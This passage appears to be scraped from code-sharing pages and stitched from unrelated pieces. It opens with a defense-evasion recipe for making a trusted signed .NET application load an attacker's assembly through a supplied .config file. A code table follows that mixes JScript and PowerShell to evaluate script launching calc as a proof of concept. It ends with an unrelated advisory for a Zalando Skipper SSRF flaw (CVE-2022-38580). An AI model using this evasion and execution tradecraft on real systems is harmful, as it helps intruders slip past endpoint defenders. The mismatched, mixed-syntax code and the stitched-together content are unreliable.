We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.
| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
| [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript'); | |
| $js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");' | |
| [Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()); |
| Name of an affected Product: Skipper [AKA Zalando Skipper] <= v0.13.236 | |
| Description: Zalando Skipper (<= v0.13.236) is vulnerable to Server-Side Request Forgery | |
| Affected version(s): <= v0.13.236 | |
| Fixed Version: v0.13.237 | |
| CVE ID: CVE-2022-38580 | |
| Vulnerability Type: SSRF [Server-Side Request Forgery] | |
| Root Cause: Custome Header [X-Skipper-Proxy] | |
| References: https://github.com/zalando/skipper/releases/tag/v0.13.237 |